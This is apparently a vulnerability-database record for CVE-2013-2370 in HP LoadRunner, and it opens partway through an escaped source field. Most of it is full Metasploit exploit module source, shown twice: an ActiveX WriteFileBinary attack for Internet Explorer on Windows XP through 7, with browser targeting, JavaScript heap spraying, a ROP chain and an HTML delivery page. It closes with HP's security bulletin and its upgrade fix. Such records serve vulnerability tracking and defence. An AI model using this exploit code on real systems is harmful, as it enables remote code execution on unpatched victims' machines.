\"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'DefaultOptions' =>\n {\n 'PrependMigrate' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # LrWebIERREWrapper.dll 11.50.2216.0\n [ 'Automatic', {} ],\n [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\n [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],\n [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2013-07-24',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n #If the user is already specified by the user, we'll just use that\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def ie_heap_spray(my_target, p)\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch))\n js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\n randnop = rand_text_alpha(rand(100) + 1)\n\n # Land the payload at 0x0c0c0c0c\n case my_target\n when targets[6]\n # IE 9 on Windows 7\n js = %Q|\n function randomblock(blocksize)\n {\n var theblock = \"\";\n for (var i = 0; i < blocksize; i++)\n {\n theblock += Math.floor(Math.random()*90)+10;\n }\n return theblock;\n }\n\n function tounescape(block)\n {\n var blocklen = block.length;\n var unescapestr = \"\";\n for (var i = 0; i < blocklen-1; i=i+4)\n {\n unescapestr += \"%u\" + block.substring(i,i+4);\n }\n return unescapestr;\n }\n\n var heap_obj = new heapLib.ie(0x10000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_random_nops}\";\n var nops = unescape(#{randnop});\n while (nops.length < 0x80000) nops += nops;\n var offset_length = #{my_target['Offset']};\n for (var i=0; i < 0x1000; i++) {\n var padding = unescape(tounescape(randomblock(0x1000)));\n while (padding.length < 0x1000) padding+= padding;\n var junk_offset = padding.substring(0, offset_length);\n var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\n heap_obj.alloc(sprayblock);\n }\n |\n\n else\n # For IE 6, 7, 8\n js = %Q|\n var heap_obj = new heapLib.ie(0x20000);\n var code = unescape(\"#{js_code}\");\n var #{randnop} = \"#{js_nops}\";\n var nops = unescape(#{randnop});\n while (nops.length < 0x80000) nops += nops;\n var offset = nops.substring(0, #{my_target['Offset']});\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\n while (shellcode.length < 0x40000) shellcode += shellcode;\n var block = shellcode.substring(0, (0x80000-6)/2);\n heap_obj.gc();\n for (var i=1; i < 0x300; i++) {\n heap_obj.alloc(block);\n }\n |\n\n end\n\n js = heaplib(js, {:noobfu => true})\n\n if datastore['OBFUSCATE']\n js = ::Rex::Exploitation::JSObfu.new(js)\n js.obfuscate(memory_sensitive: true)\n end\n\n return js\n end\n\n def get_payload(t, cli)\n code = payload.encoded\n\n fake_object = [\n 0x0c0c0c0c, # fake vftable pointer\n 0x0c0c0c14 # function pointer\n ].pack(\"V*\")\n\n # No rop. Just return the payload.\n return fake_object + code if t['Rop'].nil?\n\n # Both ROP chains generated by mona.py - See corelan.be\n case t['Rop']\n when :jre\n print_status(\"Using msvcr71.dll ROP\")\n fake_object = [\n 0x0c0c0c0c, # fake vftable pointer\n 0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn\n ].pack(\"V*\")\n rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n p = get_payload(my_target, cli)\n js = ie_heap_spray(my_target, p)\n object_id = rand_text_alpha(rand(10) + 8)\n\n html = %Q|\n <html>\n <head>\n <script>\n #{js}\n </script>\n </head>\n <body>\n <object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object>\n <script language='javascript'>\n #{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c);\n </script>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n # Avoid the attack if no suitable target found\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:20:58", "description": "", "published": "2013-08-29T00:00:00", "type": "packetstorm", "title": "HP LoadRunner lrFileIOService ActiveX Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2370"], "modified": "2013-08-29T00:00:00", "id": "PACKETSTORM:123001", "href": "https://packetstormsecurity.com/files/123001/HP-LoadRunner-lrFileIOService-ActiveX-Remote-Code-Execution.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::RopDb \ninclude Msf::Exploit::Remote::BrowserAutopwn \n \nautopwn_info({ \n:ua_name => HttpClients::IE, \n:ua_minver => \"6.0\", \n:ua_maxver => \"9.0\", \n:javascript => true, \n:os_name => OperatingSystems::WINDOWS, \n:rank => Rank, \n:classid => \"{8D9E2CC7-D94B-4977-8510-FB49C361A139}\", \n:method => \"WriteFileBinary\" \n}) \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"HP LoadRunner lrFileIOService ActiveX Remote Code Execution\", \n'Description' => %q{ \nThis module exploits a vulnerability on the lrFileIOService ActiveX, as installed \nwith HP LoadRunner 11.50. The vulnerability exists in the WriteFileBinary method \nwhere user provided data is used as a memory pointer. This module has been tested \nsuccessfully on IE6-IE9 on Windows XP, Vista and 7, using the LrWebIERREWrapper.dll \n11.50.2216.0. In order to bypass ASLR the no aslr compatible module msvcr71.dll is \nused. This one is installed with HP LoadRunner. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability discovery \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-2370' ], \n[ 'OSVDB', '95640' ], \n[ 'BID', '61441'], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-182/' ], \n[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03862772' ] \n], \n'Payload' => \n{ \n'Space' => 1024, \n'DisableNops' => true, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'DefaultOptions' => \n{ \n'PrependMigrate' => true \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# LrWebIERREWrapper.dll 11.50.2216.0 \n[ 'Automatic', {} ], \n[ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], \n[ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4' } ], \n[ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ], \n[ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ], \n[ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ], \n[ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ] \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jul 24 2013\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) \n], self.class) \n \nend \n \ndef get_target(agent) \n#If the user is already specified by the user, we'll just use that \nreturn target if target.name != 'Automatic' \n \nnt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || '' \nie = agent.scan(/MSIE (\\d)/).flatten[0] || '' \n \nie_name = \"IE #{ie}\" \n \ncase nt \nwhen '5.1' \nos_name = 'Windows XP SP3' \nwhen '6.0' \nos_name = 'Windows Vista' \nwhen '6.1' \nos_name = 'Windows 7' \nend \n \ntargets.each do |t| \nif (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) \nprint_status(\"Target selected as: #{t.name}\") \nreturn t \nend \nend \n \nreturn nil \nend \n \ndef ie_heap_spray(my_target, p) \njs_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) \njs_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(target.arch)) \njs_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) \n \n# Land the payload at 0x0c0c0c0c \ncase my_target \nwhen targets[6] \n# IE 9 on Windows 7 \njs = %Q| \nfunction randomblock(blocksize) \n{ \nvar theblock = \"\"; \nfor (var i = 0; i < blocksize; i++) \n{ \ntheblock += Math.floor(Math.random()*90)+10; \n} \nreturn theblock; \n} \n \nfunction tounescape(block) \n{ \nvar blocklen = block.length; \nvar unescapestr = \"\"; \nfor (var i = 0; i < blocklen-1; i=i+4) \n{ \nunescapestr += \"%u\" + block.substring(i,i+4); \n} \nreturn unescapestr; \n} \n \nvar heap_obj = new heapLib.ie(0x10000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_random_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset_length = #{my_target['Offset']}; \nfor (var i=0; i < 0x1000; i++) { \nvar padding = unescape(tounescape(randomblock(0x1000))); \nwhile (padding.length < 0x1000) padding+= padding; \nvar junk_offset = padding.substring(0, offset_length); \nvar single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); \nwhile (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; \nsprayblock = single_sprayblock.substring(0, (0x40000-6)/2); \nheap_obj.alloc(sprayblock); \n} \n| \n \nelse \n# For IE 6, 7, 8 \njs = %Q| \nvar heap_obj = new heapLib.ie(0x20000); \nvar code = unescape(\"#{js_code}\"); \nvar nops = unescape(\"#{js_nops}\"); \nwhile (nops.length < 0x80000) nops += nops; \nvar offset = nops.substring(0, #{my_target['Offset']}); \nvar shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); \nwhile (shellcode.length < 0x40000) shellcode += shellcode; \nvar block = shellcode.substring(0, (0x80000-6)/2); \nheap_obj.gc(); \nfor (var i=1; i < 0x300; i++) { \nheap_obj.alloc(block); \n} \n| \n \nend \n \njs = heaplib(js, {:noobfu => true}) \n \nif datastore['OBFUSCATE'] \njs = ::Rex::Exploitation::JSObfu.new(js) \njs.obfuscate \nend \n \nreturn js \nend \n \ndef get_payload(t, cli) \ncode = payload.encoded \n \nfake_object = [ \n0x0c0c0c0c, # fake vftable pointer \n0x0c0c0c14 # function pointer \n].pack(\"V*\") \n \n# No rop. Just return the payload. \nreturn fake_object + code if t['Rop'].nil? \n \n# Both ROP chains generated by mona.py - See corelan.be \ncase t['Rop'] \nwhen :jre \nprint_status(\"Using msvcr71.dll ROP\") \nfake_object = [ \n0x0c0c0c0c, # fake vftable pointer \n0x7c342643 # xchg eax,esp # pop edi # add byte ptr ds:[eax],al # pop ecx # retn \n].pack(\"V*\") \nrop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) \nend \n \nreturn rop_payload \nend \n \ndef load_exploit_html(my_target, cli) \np = get_payload(my_target, cli) \njs = ie_heap_spray(my_target, p) \nobject_id = rand_text_alpha(rand(10) + 8) \n \nhtml = %Q| \n<html> \n<head> \n<script> \n#{js} \n</script> \n</head> \n<body> \n<object classid='clsid:8D9E2CC7-D94B-4977-8510-FB49C361A139' id='#{object_id}'></object> \n<script language='javascript'> \n#{object_id}.WriteFileBinary(\"#{rand_text_alpha(4+ rand(4))}\", 0x0c0c0c0c); \n</script> \n</body> \n</html> \n| \n \nreturn html \nend \n \ndef on_request_uri(cli, request) \nagent = request.headers['User-Agent'] \nuri = request.uri \nprint_status(\"Requesting: #{uri}\") \n \nmy_target = get_target(agent) \n# Avoid the attack if no suitable target found \nif my_target.nil? \nprint_error(\"Browser not supported, sending 404: #{agent}\") \nsend_not_found(cli) \nreturn \nend \n \nhtml = load_exploit_html(my_target, cli) \nhtml = html.gsub(/^\\t\\t/, '') \nprint_status(\"Sending HTML...\") \nsend_response(cli, html, {'Content-Type'=>'text/html'}) \nend \n \nend`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123001/hp_loadrunner_writefilebinary.rb.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-4797", "CVE-2013-2370", "CVE-2013-4800", "CVE-2013-4798", "CVE-2013-2368", "CVE-2013-2369", "CVE-2013-4801", "CVE-2013-4799"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c03862772\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c03862772\r\nVersion: 1\r\n\r\nHPSBGN02905 rev.1 - HP LoadRunner, Remote Code Execution and Denial of\r\nService (DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2013-07-24\r\nLast Updated: 2013-07-24\r\n\r\nPotential Security Impact: Remote code execution, Denial of Service (DoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP LoadRunner.\r\nThe vulnerabilities could be remotely exploited to allow execution of code or\r\nresult in a Denial of Service (DoS).\r\n\r\nReferences:\r\n\r\nCVE-2013-2368 (SSRT101081, ZDI-CAN-1669) Remote Denial of Service (DoS)\r\nCVE-2013-2369 (SSRT101082, ZDI-CAN-1670) Remote Code Execution\r\nCVE-2013-2370 (SSRT101083, ZDI-CAN-1671) Remote Code Execution\r\nCVE-2013-4797 (SSRT101084, ZDI-CAN-1690) Remote Code Execution\r\nCVE-2013-4798 (SSRT101074, ZDI-CAN-1705) Remote Code Execution\r\nCVE-2013-4799 (SSRT101114, ZDI-CAN-1734) Remote Code Execution\r\nCVE-2013-4800 (SSRT101117, ZDI-CAN-1735) Remote Code Execution\r\nCVE-2013-4801 (SSRT101085, ZDI-CAN-1736) Remote Code Execution\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP LoadRunner prior to v11.52\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-2368 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-2369 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-2370 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-4797 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\nCVE-2013-4798 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2013-4799 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\r\nCVE-2013-4800 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\r\nCVE-2013-4801 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks Andrea Micalizzi aka rgod for working with\r\nthe TippingPoint Zero Day Initiative to report CVE-2013-2368, CVE-2013-2369,\r\nCVE-2013-2370, CVE-2013-4797 and CVE-2013-4801 to security-alert@hp.com\r\n\r\nThe Hewlett-Packard Company thanks Brian Gorenc from HP DVLabs for working\r\nwith the TippingPoint Zero Day Initiative to report CVE-2013-4798 to\r\nsecurity-alert@hp.com\r\n\r\nThe Hewlett-Packard Company thanks Tenable Network Security for working with\r\nthe TippingPoint Zero Day Initiative to report CVE-2013-4799 and\r\nCVE-2013-4800 to security-alert@hp.com\r\n\r\nRESOLUTION\r\n\r\nHP has made the following software update available to resolve the\r\nvulnerabilities.\r\n\r\nHP LoadRunner v11.52 or subsequent.\r\n\r\nThe software update is available from HP Software Support Online at\r\nhttp://support.openview.hp.com/selfsolve/document/KM00424389 .\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 July 2013 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2013 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits;damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlHwLG0ACgkQ4B86/C0qfVlv5wCgn8aewU6jORuKn7BKNK3QpKvU\r\nWtcAoM+RiD1hTExSVx2Ybver7PkYTvoR\r\n=ufJ9\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:DOC:29652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29652", "title": "[security bulletin] HPSBGN02905 rev.1 - HP LoadRunner, Remote Code Execution and Denial of Service (DoS)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4797", "CVE-2013-2370", "CVE-2013-4800", "CVE-2013-4798", "CVE-2013-2368", "CVE-2013-2369", "CVE-2013-4801", "CVE-2013-4799"], "description": "DoS, code execution.", "edition": 1, "modified": "2013-07-29T00:00:00", "published": "2013-07-29T00:00:00", "id": "SECURITYVULNS:VULN:13218", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13218", "title": "HP LoadRunner multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
